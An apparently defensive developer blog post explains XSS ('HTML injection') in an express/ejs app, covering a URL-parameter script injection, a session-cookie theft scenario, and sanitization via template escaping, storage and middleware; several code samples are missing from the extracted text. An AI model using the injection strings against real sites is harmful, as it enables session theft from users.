XSS aka HTML Injection Attack explained
Originally published at jamischarles.com.
alert(), usually passed by url params.
Recently at work I needed to patch an app for an XSS vulnerability. I was doing research on XSS and came across this great thought (unfortunately I lost the link):
I wish we could rename XSS to HTML Injection Attack.
<script> tag) into your html which is then executed.
How does this HTML Injection Attack work in practice?
Let’s say we have a node.js webapp. We’re running express.js and using ejs for our templating language.
We’re fetching the
name url param and injecting it into the ejs template.
With the following result:
So far so good. Nothing fishy going on here. Now let’s try to insert a
<script> tag into the url:
Sounds like Chrome can see that this is likely an XSS attack, and blocked it. Great!
How can this attack hurt me?
An alert box on a page is pretty harmless. So how could this actually hurt somebody?
Here’s how an attacker could use this to get access to your bank account.
- You’d receive an email with instructions to log into your bank.
- After login, you’re instructed to click on this link
When you login, your bank’s website server starts a session for you (usually lasting 10–15 minutes, after which you are automatically logged out). The session information (usually called a
token) is stored in a cookie on your computer.
If the hacker can get you to login, and then click the link he sent you, then
maliciousCodeHere will run, and could send your session token to the hacker.
This allows him to steal your session. He could then (in theory) create a cookie on his computer and store your session information in it. If that session is still active, he can visit your banks website, and he’ll be logged in as you, and can browse around, look at bank account information, and possibly even initiate a transfer or change your password.
How to protect against an HTML Injection Attack
The general rule is this:
Treat any user input as unsafe.
This means that we need to sanitize any user-provided values. There are a number of libraries that do that for you, so I won’t call any out specifically.
There are several places you could sanitize. In general you should sanitize on the server, because any client-side sanitization could be circumvented by an attacker.
Sanitizing at the templating layer
The most common place to sanitize is at the templating layer, and most templating languages have built in support for this. In EJS, you use
<%= name %>by default because it sanitizes by encoding any html tags, so any
<script> tag will show up as
<script> in the html and
<script> tag on the webpage. This means it’ll be rendered and not executed. You are safe. In my attack example above I used
<%- name instead of
<%- in EJS will render raw html that won’t be sanitized, and should thus be avoided with user input.
If you have your own templating solution or use es6 template strings, you should sanitize your user values via some XSS library. At the very least you could strip out common XSS attack strings like
<script> from the input.
Sanitizing at the storage layer
If you are saving any values to a database (like URL names, or user names, or emails) that will be displayed to the user, this is a prime location for an HTML injection attack. If I can store
<script>[maliciousCode]</script> as my display name for a social site, then anybody else who sees my name could potentially run my code in their browser and I can steal their credentials. Sanitizing before you save any values from user input is a must.
Sanitizing at the url param layer
This is my least favorite option, but you could add some middleware that sanitizes all the route parameters like so:
In summary, HTML Injection Attacks (XSS) are usually about injecting unsafe JS into the HTML (often via the URL) in order to get a victim to run that malicious JS in their browser to steal info they have access to because they’ve logged in.
Treat all user input as unsafe, and sanitize it.
You should follow me on twitter.